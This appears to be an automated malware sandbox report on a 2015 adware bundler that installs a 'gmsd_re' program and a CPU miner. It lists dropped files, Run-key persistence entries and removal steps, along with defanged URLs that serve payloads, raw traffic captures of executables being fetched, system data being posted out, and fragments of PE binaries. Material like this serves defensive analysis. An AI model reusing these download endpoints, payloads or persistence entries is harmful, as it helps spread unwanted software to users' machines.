%Documents and Settings%\%current user%\Local Settings\Temp\3290\Icons\booking.com.ico (1601 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\chrome.dat (31 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3290\Icons\ikea.ico (2993 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-4OD0U.tmp\gamesdesktop_widget.exe (92831 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-4OD0U.tmp\gmsd_re_005010082.exe (31991 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-4OD0U.tmp\predm.exe (1271 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-4OD0U.tmp\upgmsd_re_005010082.exe (24254 bytes)
%Documents and Settings%\%current user%\Cookies\index.dat (1928 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\gmsd_re_005010082\upgmsd_re_005010082.cyl (428 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@prof.youandmeandmeandyouhihi[1].txt (231 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@youandmeandmeandyouhihi[1].txt (182 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsh37.tmp (7288 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsf36.tmp\CPUFeatures.dll (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\Bundle_CPUminer[1].exe (7288 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsf36.tmp\inetc.dll (20 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\ibf-cmi-1938953175.us-east-1.elb.amazonaws[2].htm (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl11.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi1F.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn1E.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsfF.tmp (17738 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd33.tmp (6872 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\7121923af824073a25b2b7e6ba0a6e0e[1].exe (4152 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz1C.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\setup_gmsd_re[1].exe (365499 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\cmmdWriter[1].exe (2696 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\ibf-cmi-1938953175.us-east-1.elb.amazonaws[1].htm (60 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsp19.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsq25.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\Validate[1].exe (4152 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl10.tmp\inetc.dll (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nso34.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst21.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\df4a6a3ed77e60d6758afca091ca0c1f[1].exe (6872 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\smt[1].exe (13784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsp1D.tmp (128293 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsb27.tmp (4152 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss44.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy18.tmp (11704 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy17.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Uninstall.exe (4152 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsq26.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\ibf-cmi-1938953175.us-east-1.elb.amazonaws[2].htm (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\VISWHQk[1].exe (11704 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu23.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd15.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd3C.tmp (365499 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi38.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\ibf-cmi-1938953175.us-east-1.elb.amazonaws[1].htm (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\vos[1].htm (979 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsc43.tmp (13784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\setup[1].exe (128293 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsb12.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\36e0f22eacad857de2cd3b76aedc24a7[1].exe (3808 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsc14.tmp (2696 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw13.tmp (979 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx2F.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm28.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw42.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst20.tmp (3808 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr3D.tmp (15 bytes) - Delete the following value(s) in the autorun key (How to Work with System Registry):
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"gmsd_re_005010082" = "%Program Files%\gmsd_re_005010082\gmsd_re_005010082.exe"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"upgmsd_re_005010082.exe" = "%Documents and Settings%\%current user%\Local Settings\Application Data\gmsd_re_005010082\upgmsd_re_005010082.exe -runhelper" - Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
- Reboot the computer.
Static Analysis
VersionInfo
No information is available.
No information is available.
PE Sections
| Name | Virtual Address | Virtual Size | Raw Size | Entropy | Section MD5 |
|---|---|---|---|---|---|
| .text | 4096 | 23628 | 24064 | 4.46394 | 856b32eb77dfd6fb67f21d6543272da5 |
| .rdata | 28672 | 4764 | 5120 | 3.4982 | dc77f8a1e6985a4361c55642680ddb4f |
| .data | 36864 | 154712 | 1024 | 3.3278 | 7922d4ce117d7d5b3ac2cffe4b0b5e4f |
| .ndata | 192512 | 1183744 | 0 | 0 | d41d8cd98f00b204e9800998ecf8427e |
| .rsrc | 1376256 | 1736 | 2048 | 2.02132 | 480f21bf3c105b20c6d2cb8598d0b16c |
Dropped from:
Downloaded by:
Similar by SSDeep:
Similar by Lavasoft Polymorphic Checker:
Total found: 335
a5b362eaa5107233922d116064150b18
158a98a822f798bdb94723f9e1935623
fa58b09759639026299fe8d086b5c09d
692c8facf0591a41e8cb4be1671df672
9811196d1d42348220f9e9a2f9a4e3e8
2fae92324f64572d31a3a7ecd0590ce6
8bb9a9dea9311671e06482f9ec5318aa
c0c5cc8755825eaba05a4d361348392f
9a443574ea12da2f8cf331a9ba2ee28e
13166571a71af6a4221b72622dab8807
e727b97c7a7678a5c01f34c2a5633e76
26ed1b8284dc924e77b7c0588b4520f3
95a41fde49afb72046898a866001a95e
d27ee18d95dc184ee4d8d3791e6417d5
94aa7dbedeb69b99e633b79adec3428c
45ca65981b3c3e945b0e4cdc53db9ba2
9dd75707a1f8bbbd934891ac2f866e65
10ae755adfe308553c6276bb9d613d8a
b323c58bf4a0d001d1bf5c1b38feb286
baf718169de2c21c4761d5bd89ceeb77
ef0e9610146fc74405f34052d9039905
b5dc32575ffddf1a282708692c1f8464
b1d062ed686634c53c4213299d30b201
8169c8044caee125abec9429691e9f96
4e35dd9d2147b707331ddb7e8211024d
Network Activity
URLs
| URL | IP |
|---|---|
| hxxp://ibf-cmi-1938953175.us-east-1.elb.amazonaws.com/ | 107.21.122.166 |
| hxxp://download-servers.com/SysInfo/Validate.exe | 50.7.184.170 |
| hxxp://download-servers.com/Generic/vos.php?ch=NOCHPC&rdsn=0&idn=1&sid=&isnw=2&civ=2&or=&pac=&guidv=2&vpname=&prdk=&tst= | 50.7.184.170 |
| hxxp://d2fpsq9kg43yka.cloudfront.net/cmmdWriter.exe | 54.239.168.217 |
| hxxp://download-servers.com/SysInfo/validator/timer.php | 50.7.184.170 |
| hxxp://cds.c5z6s5a3.hwcdn.net/69/all/cp/row/setup.exe | |
| hxxp://d16hr9n7t75k58.cloudfront.net/36e0f22eacad857de2cd3b76aedc24a7.exe | 54.239.168.183 |
| hxxp://ipgeoapi.com/ | 50.16.215.101 |
| hxxp://cds.c5z6s5a3.hwcdn.net/data.gif?app=12345&ibic=c34de9db4800cc5c07ea55982373e9fd&verifier=394e163cb9e37b27c10848a9a1e45ae5&ver=107&os=XP32&browser=ci&campaign=003266&browserver=107&country=UA&event=3&rnd=2838 | |
| hxxp://s3-website-us-east-1.amazonaws.com/installer.gif?action=started&ibic=c34de9db4800cc5c07ea55982373e9fd&verifier=394e163cb9e37b27c10848a9a1e45ae5&os=XP32&chver=X&ffver=X&iever=6&app=12345&srcid=003266&default=ie&ver=107&crtnm=OralTeams&rnd=2004 | |
| hxxp://s3-website-us-east-1.amazonaws.com/utility.gif?report=fdata&f=4&c=003266&i=100&n=install_browser_start_async&ibic=c34de9db4800cc5c07ea55982373e9fd&rnd=6423 | |
| hxxp://s3-website-us-east-1.amazonaws.com/utility.gif?report=fdata&f=4&c=003266&i=250&n=install_browser_downloading&ibic=c34de9db4800cc5c07ea55982373e9fd&rnd=9431 | |
| hxxp://s3-website-us-east-1.amazonaws.com/utility.gif?report=fdata&f=4&c=003266&i=270&n=install_browser_all_thread_created_success&ibic=c34de9db4800cc5c07ea55982373e9fd&rnd=6862 | |
| hxxp://cds.c5z6s5a3.hwcdn.net/crossbrowse/ie/107/ie.zip.004 | |
| hxxp://cds.c5z6s5a3.hwcdn.net/crossbrowse/ie/107/ie.zip.003 | |
| hxxp://cds.c5z6s5a3.hwcdn.net/crossbrowse/ie/107/ie.zip.002 | |
| hxxp://cds.c5z6s5a3.hwcdn.net/crossbrowse/ie/107/ie.zip.005 | |
| hxxp://cds.c5z6s5a3.hwcdn.net/crossbrowse/ie/107/ie.zip.001 | |
| hxxp://d1mdi78qyff344.cloudfront.net/7121923af824073a25b2b7e6ba0a6e0e.exe | 54.239.168.201 |
| hxxp://cds.r5q6q4j7.hwcdn.net/OperaRUnew/Bundle_OperaRUnew.exe | |
| hxxp://ils-front-balancer3-264552681.us-east-1.elb.amazonaws.com/thankyou.php | |
| hxxp://s3-website-us-east-1.amazonaws.com/utility.gif?report=fdata&f=4&c=003266&i=310&n=install_browser_all_thread_ended_success&ibic=c34de9db4800cc5c07ea55982373e9fd&rnd=933 | |
| hxxp://cds.r5q6q4j7.hwcdn.net/CPUminer/Bundle_CPUminer.exe | |
| hxxp://dl.tuto4pc.com/download/dwn/prq4633/este/re/setup_gmsd_re.exe | |
| hxxp://s3-website-us-east-1.amazonaws.com/utility.gif?report=fdata&f=4&c=003266&i=360&n=install_browser_all_files_in_place&ibic=c34de9db4800cc5c07ea55982373e9fd&rnd=5132 | |
| hxxp://prof.eorezo.com/cgi-bin/get_protect.cgi?checking=true&version=gmsd_us_233&forceGEO=US | 37.187.148.123 |
| hxxp://ads.regiedepub.com/cgi-bin/advert/settags?x_mode=args&x_format=javascript&x_dp_id=1203&x_pub_id=134153&tag=RE_CLICKMEIN_INSTALL_INI | 37.187.148.215 |
| hxxp://prof.eorezo.com/cgi-bin/get_protect.cgi | 37.187.148.123 |
| hxxp://ads.under-myscreen.be/cgi-bin/advert/getkws.cgi?did=90068&version=0&key=azJJ.s8MVPsHc | 188.165.249.119 |
| hxxp://ads.regiedepub.com/cgi-bin/advert/settags?x_mode=args&x_format=javascript&x_dp_id=1203&x_pub_id=134153&tag=RE_CLICKMEIN_INSTALL_F11 | 37.187.148.215 |
| hxxp://ads.regiedepub.com/cgi-bin/advert/settags?x_mode=args&x_format=javascript&x_dp_id=1203&x_pub_id=134153&tag=RE_CLICKMEIN_INSTALL_FIN | 37.187.148.215 |
| hxxp://ads.regiedepub.com/cgi-bin/advert/settags?x_mode=args&x_format=javascript&x_dp_id=1203&x_pub_id=134153&tag=RE_CLICKMEIN_COUNT1 | 37.187.148.215 |
| hxxp://ads.regiedepub.com/cgi-bin/advert/settags?x_mode=args&x_format=javascript&x_dp_id=1203&x_pub_id=134153&tag=RE_CLICKMEIN_DCOUNT1 | 37.187.148.215 |
| hxxp://d10huri5h4o4a3.cloudfront.net/smt.exe | 54.239.168.70 |
| hxxp://s3-website-us-east-1.amazonaws.com/utility.gif?report=fdata&f=4&c=003266&i=410&n=install_browser_install_ch_success&ibic=c34de9db4800cc5c07ea55982373e9fd&rnd=6473 | |
| hxxp://d27foqb3kkzkt9.cloudfront.net/sdk/binsis/2.2/BiTool.dll | 54.239.168.105 |
| hxxp://s3-website-us-east-1.amazonaws.com/utility.gif?report=fdata&f=4&c=003266&i=480&n=install_browser_end_success&ibic=c34de9db4800cc5c07ea55982373e9fd&rnd=1898 | |
| hxxp://cds.c5z6s5a3.hwcdn.net/data.gif?app=12345&ibic=c34de9db4800cc5c07ea55982373e9fd&verifier=394e163cb9e37b27c10848a9a1e45ae5&ver=107&os=XP32&browser=ci&campaign=003266&browserver=107&country=UA&event=4&rnd=2444 | |
| hxxp://d3oxtn1x3b8d7i.cloudfront.net/binsis/get_pre_offering_checks?uid=78E613EC0FD24B388D7E6C851DDC4F6F&v=2.2.2&v1=U2VyaWFsTnVtYmVyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBWZXJzaW9uICAgICAgICAgICANDQpWTXdhcmUtNTYgNGQgNzAgMTMgYjYgYzEgMWMgYmQtYjAgMjkgOWEgMWYgNzggZmQgNTUgYTMgIElOVEVMICAtIDYwNDAwMDA&affid=vuupcntmb&sid=vuupculwo&s=0 | 54.239.168.211 |
| hxxp://d3oxtn1x3b8d7i.cloudfront.net/binsis/xml?uid=78E613EC0FD24B388D7E6C851DDC4F6F&v=2.2.2&v1=U2VyaWFsTnVtYmVyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBWZXJzaW9uICAgICAgICAgICANDQpWTXdhcmUtNTYgNGQgNzAgMTMgYjYgYzEgMWMgYmQtYjAgMjkgOWEgMWYgNzggZmQgNTUgYTMgIElOVEVMICAtIDYwNDAwMDA&affid=vuupcntmb&sid=vuupculwo&s=0 | 54.239.168.211 |
| hxxp://d1r531x3ryfc51.cloudfront.net/installers/bi_downloader/1441577004706/setup.exe | |
| hxxp://zip.rgbdomsrv.com/crossbrowse/ie/107/ie.zip.002 | 69.16.175.42 |
| hxxp://zip.rgbdomsrv.com/crossbrowse/ie/107/ie.zip.001 | 69.16.175.42 |
| hxxp://www.software-forus.com/OperaRUnew/Bundle_OperaRUnew.exe | 205.185.216.10 |
| hxxp://livestatscounter.com/Generic/vos.php?ch=NOCHPC&rdsn=0&idn=1&sid=&isnw=2&civ=2&or=&pac=&guidv=2&vpname=&prdk=&tst= | 50.7.133.50 |
| hxxp://err.rgbdomsrv.com/utility.gif?report=fdata&f=4&c=003266&i=100&n=install_browser_start_async&ibic=c34de9db4800cc5c07ea55982373e9fd&rnd=6423 | 54.231.34.4 |
| hxxp://dl.staticclientstorage.com/69/all/cp/row/setup.exe | 69.16.175.42 |
| hxxp://logs.rgbdomsrv.com/data.gif?app=12345&ibic=c34de9db4800cc5c07ea55982373e9fd&verifier=394e163cb9e37b27c10848a9a1e45ae5&ver=107&os=XP32&browser=ci&campaign=003266&browserver=107&country=UA&event=3&rnd=2838 | 69.16.175.10 |
| hxxp://zip.rgbdomsrv.com/crossbrowse/ie/107/ie.zip.004 | 69.16.175.42 |
| hxxp://err.rgbdomsrv.com/utility.gif?report=fdata&f=4&c=003266&i=360&n=install_browser_all_files_in_place&ibic=c34de9db4800cc5c07ea55982373e9fd&rnd=5132 | 54.231.34.4 |
| hxxp://livestatscounter.com/SysInfo/validator/timer.php | 50.7.133.50 |
| hxxp://www.software-forus.com/CPUminer/Bundle_CPUminer.exe | 205.185.216.10 |
| hxxp://zip.rgbdomsrv.com/crossbrowse/ie/107/ie.zip.003 | 69.16.175.42 |
| hxxp://mystats.rgbdomsrv.com/installer.gif?action=started&ibic=c34de9db4800cc5c07ea55982373e9fd&verifier=394e163cb9e37b27c10848a9a1e45ae5&os=XP32&chver=X&ffver=X&iever=6&app=12345&srcid=003266&default=ie&ver=107&crtnm=OralTeams&rnd=2004 | 54.231.80.170 |
| hxxp://err.rgbdomsrv.com/utility.gif?report=fdata&f=4&c=003266&i=270&n=install_browser_all_thread_created_success&ibic=c34de9db4800cc5c07ea55982373e9fd&rnd=6862 | 54.231.34.4 |
| hxxp://logs.rgbdomsrv.com/data.gif?app=12345&ibic=c34de9db4800cc5c07ea55982373e9fd&verifier=394e163cb9e37b27c10848a9a1e45ae5&ver=107&os=XP32&browser=ci&campaign=003266&browserver=107&country=UA&event=4&rnd=2444 | 69.16.175.10 |
| hxxp://zip.rgbdomsrv.com/crossbrowse/ie/107/ie.zip.005 | 69.16.175.42 |
| hxxp://err.rgbdomsrv.com/utility.gif?report=fdata&f=4&c=003266&i=410&n=install_browser_install_ch_success&ibic=c34de9db4800cc5c07ea55982373e9fd&rnd=6473 | 54.231.34.4 |
| hxxp://err.rgbdomsrv.com/utility.gif?report=fdata&f=4&c=003266&i=480&n=install_browser_end_success&ibic=c34de9db4800cc5c07ea55982373e9fd&rnd=1898 | 54.231.34.4 |
| hxxp://dl.taxideataxus.com/download/dwn/prq4633/este/re/setup_gmsd_re.exe | 176.31.126.119 |
| hxxp://err.rgbdomsrv.com/utility.gif?report=fdata&f=4&c=003266&i=250&n=install_browser_downloading&ibic=c34de9db4800cc5c07ea55982373e9fd&rnd=9431 | 54.231.34.4 |
| hxxp://www.downloadsoup.com/thankyou.php | 54.243.139.119 |
| hxxp://prof.youandmeandmeandyouhihi.com/cgi-bin/get_protect.cgi | 37.187.148.125 |
| hxxp://err.rgbdomsrv.com/utility.gif?report=fdata&f=4&c=003266&i=310&n=install_browser_all_thread_ended_success&ibic=c34de9db4800cc5c07ea55982373e9fd&rnd=933 | 54.231.34.4 |
| hxxp://sub.spirlymo.com/installers/bi_downloader/1441577004706/setup.exe | 54.239.168.116 |
| s3.amazonaws.com | 54.231.8.184 |
| upd.adskyforever.com | 188.165.209.115 |
IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)
Traffic
POST /thankyou.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: VVV.downloadsoup.com
Content-Length: 469
Connection: Keep-Alive
Cache-Control: no-cache
cnt=daa8ba6c6755c5f89ef7fd05d0b42046&_srvlog=NSI &browser=ie&capp=nsdummy&cid=11612¤t_screen=Finish_Last_Screen&is=0&netfs=0&os=&sysid=C8318CA6891F5119A9FD96EC19E98D71&sysid1=C8318CA6891F5119A9FD96EC19E98D71&te=1441580331&ts=1441580329&ver=1.1.2.41&c[OperaRUnew][s]=-2&c[Updater][s]=8&c[Updater][pi]=1&c[OperaRUnew][pi]=0&c[OperaRUnew][e]=0&c[OperaRUnew][ts]=0&c[OperaRUnew][te]=0&cmdl=C:DOCUME~1admLOCALS~1Tempss2A.tmp /ci 11612&bti1=
HTTP/1.1 200 OK
Content-Type: text/plain; charset=UTF-8
Date: Sun, 06 Sep 2015 22:58:50 GMT
Server: Apache/2.2.15 (Red Hat)
X-Powered-By: PHP/5.3.3
Content-Length: 14
Connection: keep-alive
.... ....
GET /installer.gif?action=started&ibic=c34de9db4800cc5c07ea55982373e9fd&verifier=394e163cb9e37b27c10848a9a1e45ae5&os=XP32&chver=X&ffver=X&iever=6&app=12345&srcid=003266&default=ie&ver=107&crtnm=OralTeams&rnd=2004 HTTP/1.1
Accept: */*
Host: mystats.rgbdomsrv.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
x-amz-id-2: Ph L8KCqr fTgFr6Z3FPfyglwWAukl4uQlqlv0jJ3jUyvpdOzS9MWhheluHfsT5pjtqCUYyoR8A=
x-amz-request-id: 6B70A93C98F7A06B
Date: Sun, 06 Sep 2015 22:58:43 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Last-Modified: Wed, 17 Jun 2015 13:20:41 GMT
ETag: "28d6814f309ea289f847c69cf91194c6"
Content-Type: image/gif
Content-Length: 35
Server: AmazonS3
GIF89a.............,...........D..;HTTP/1.1 200 OK..x-amz-id-2: Ph L8KCqr fTgFr6Z3FPfyglwWAukl4uQlqlv0jJ3jUyvpdOzS9MWhheluHfsT5pjtqCUYyoR8A=..x-amz-request-id: 6B70A93C98F7A06B..Date: Sun, 06 Sep 2015 22:58:43 GMT..Expires: Mon, 26 Jul 1997 05:00:00 GMT..Cache-Control: no-cache, must-revalidate..Last-Modified: Wed, 17 Jun 2015 13:20:41 GMT..ETag: "28d6814f309ea289f847c69cf91194c6"..Content-Type: image/gif..Content-Length: 35..Server: AmazonS3..GIF89a.............,...........D..;..
GET /sdk/binsis/2.2/BiTool.dll HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: d27foqb3kkzkt9.cloudfront.net
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Content-Type: application/octet-stream
Content-Length: 59904
Connection: keep-alive
Server: nginx
Date: Thu, 23 Jul 2015 01:04:56 GMT
Last-Modified: Tue, 15 Oct 2013 19:55:30 GMT
ETag: "525d9db2-ea00"
Expires: Thu, 23 Jul 2015 01:14:56 GMT
Cache-Control: max-age=600
Accept-Ranges: bytes
Age: 464
X-Cache: Hit from cloudfront
Via: 1.1 27b3a801292660302bc6c8d6a96c71ce.cloudfront.net (CloudFront)
X-Amz-Cf-Id: b4UaOZ_q4LnUR72ZuLerUS8zUrP39hyBqUkYKpAW4vIpOaI2_5D_3g==
MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......I}.I..h...h...h..S....h..d....h..d....h..d....h..d....h...i.W.h..d....h..d....h..d....h.Rich..h.................PE..L.....]R...........!.........,......e........................................ ......9.....@.....................................................................0...................................`...@...............H............................text..._........................... ..`.rdata..5...........................@..@.data...x...........................@....rsrc...............................@..@.reloc..............................@..B................................................................................................................................................................................................................................................................................................................................................U..Q.M..E..M....E...]...........U..Q.M..E.....].U..Q.M...]......U..Q.M..E........E...]..........U..Q.M..E..M.......]............U......M..E..8.t..M.........E....E......E...]...U..Q.M..E..M...3.;......].......U..Q.M..E.3..8........].........U..Q.M..E.P.M........M........E...].............U..Q.M..E........M.........]....U..Q.M..M.......E....t..M.Q.Z.......E...].......U...E.].........U..j.h....d.....PQ.....3.P.E.d......M..M........E......E........M.Q.M...........E......E..M.d......Y..].........U..Q.M..E.......
<<< skipped >>>
GET /crossbrowse/ie/107/ie.zip.003 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
Host: zip.rgbdomsrv.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Sun, 06 Sep 2015 22:58:42 GMT
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1441008913"
Last-Modified: Mon, 31 Aug 2015 08:15:13 GMT
Cache-Control: max-age=40537
Content-Length: 8244985
Content-Type: text/plain; charset=UTF-8
X-HW: 1441580323.dop019.am4.t,1441580322.cds064.am4.c
l...%...J.....=.6...<.,........#....U.s.I.* m..e_O.'.x..4.SV..x...q...d.[.R...A_.....&........."b.....g.........^...N}...$............^..O.&.S....y.Q..vm.!.W........j.kt.......D....%G......*..$.k...@c".e...wu..b.3..oV.....G..ER...o.V..co....v.P..[}.....m.......3.;.E..r.O...{."..'V.-....V.L.4....RF. .:`....M.8..z....z.m....7>...<t?.)$g.'.....~..i.i..W..gV...vZV......dy.cec<F2.8..ZT.W...}d.m..m5..h^...../.@.c.F.....vW......<.PQ....I.8...L-...C...........<%....n..b.4.3gJ.h.D.U...8....PV80..R.so~..k..S QGp4.%.i..I..?...Z@%.B..U!1..m.3.........|7h..s.;V,WBbPQ}=.......%..o......hc........5.9...v|.t...<"....t.Z6.........f.4.3.H..Y ...d...C-.u...B.....RIK:.*$$JP.........q..v.-........$....q..@.../-.. 6Ie.....7....0b...NR.Ti.<U.@a.$.8.m`.i... ~.Y.)j0....%....M.... .CF?0......pd.........M......~m.8.#3b .>...3|`./|W.=../#7j\U..k..@7..G.1.K..?=J../ ?....M...U.`...P.2....A&'?.:oI...\.}6...=k..D..Jv..<HfG..).>p..?.R1....GUo._.mb.M" X...6........#...V$...........GX[R...=.xX.C ~N.2..!gs.(.o...qa.......y0..G......p$0. ^.`.@.*..)?....u.&...L......6....................Q$....4AJFn....kj...................q...Q.K;.E.}..\9eL..jO4.....N..Y.........}GD{.j.....d.c.(...uMK$.h.T........~0..T.<a......PPC..x..&.%`}."5...Q%.4RS..F>@T.}...;..w...zOoL....^DX.<..'.M.Nl\..E{(.}....5.s.(....a.[...,....@.xD.:$.D?.h...:T.=r./.VD.V......k.J..9.dC..g.>_.9.........(RiV......]...}....u7.J..:c.,...D....O..-..A.x.... PP..j;...b...TA..(.,]... r..........t.....5.7`H.)<6A...9.....tD...bl.]e....F....{ .....5..
<<< skipped >>>
GET /cgi-bin/advert/settags?x_mode=args&x_format=javascript&x_dp_id=1203&x_pub_id=134153&tag=RE_CLICKMEIN_COUNT1 HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Accept: */*
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
Host: ads.regiedepub.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Sun, 06 Sep 2015 22:59:09 GMT
Server: Apache/2.2.16 (Debian) mod_ssl/2.2.16 OpenSSL/0.9.8o mod_wsgi/3.3 Python/2.6.6 mod_perl/2.0.4 Perl/v5.10.1
Content-Location: settags.cgi
Vary: negotiate
TCN: choice
Cache-Control: no-store, no-cache, must-revalidate
X-C4PC-ServerName: ads.regiedepub.com
P3P: policyref="hXXp://ads.regiedepub.com/w3c/p3p.xml",CP="NON DSP COR CURa PSA PSD OUR BUS NAV STA"
Expires: Sun, 06 Sep 15 22:59:00 GMT
Set-Cookie: _c4aid=D1402663038E45A2BDB7F5AF181223AC; expires=Fri, 04 Mar 16 22:59:00 GMT; domain=regiedepub.com; path=/;
Set-Cookie: _c4aid2=D1402663038E45A2BDB7F5AF181223AC,1441580349.46719; expires=Fri, 04 Mar 16 22:59:00 GMT; domain=regiedepub.com; path=/;
Connection: close
Transfer-Encoding: chunked
Content-Type: text/javascript
41.......if (window.rdp_callback).....rdp_callback(1203, 134153);......0..
GET /36e0f22eacad857de2cd3b76aedc24a7.exe HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: d16hr9n7t75k58.cloudfront.net
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Content-Type: application/x-msdownload
Content-Length: 56304
Connection: keep-alive
Date: Thu, 27 Aug 2015 12:47:59 GMT
Last-Modified: Thu, 27 Aug 2015 10:14:28 GMT
ETag: "b638732ad509ece4839c3329584ea42b"
Accept-Ranges: bytes
Server: AmazonS3
Age: 36445
X-Cache: Hit from cloudfront
Via: 1.1 1415e6a9d308119037d1fa89386da72a.cloudfront.net (CloudFront)
X-Amz-Cf-Id: EZNAGlFeNUHqCNAk12I2rTH_FQjWTI50Y_Wj1xFKmVMES7RZlKm3Jw==
MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1..:u..iu..iu..i...iw..iu..i...i...id..i!..i...i...it..iRichu..i........................PE..L......K.................^...........0.......p....@..........................................................................t.......................................................................................p...............................text...L\.......^.................. ..`.rdata.......p.......b..............@..@.data...X\...........v..............@....ndata...................................rsrc................z..............@..@........................................................................................................................................................................................................................................................................................................................................................................U....\.}..t .}.F.E.u..H....h.B..H.P.u..u..u...Hr@..B...SV.5p.B..E.WP.u...Lr@..e...E..E.P.u...Pr@..}..e....Dp@........FR..VV..U... M.......M....3.....FQ.....NU..M..........VT..U.....FP..E...............E.P.M...Hp@..E...E.P.E.P.u...Tr@..u....E..9}...w....~X.te.v4..Lp@....E.tU.}.j.W.E......E.......Pp@..vXW..Tp@..u..5Xp@.W...E..E.h ...Pj.h`.B.W..Xr@..u.W...u....E.P.u...\r@._^3.[.....L$....B...Si.....VW.T.....tO.q.3.;5..B.sB..i......D.......t.G.....t...O..t .....u...3....3...F.....;5..B.r._^[...U..QQ.U.SV..i....
<<< skipped >>>
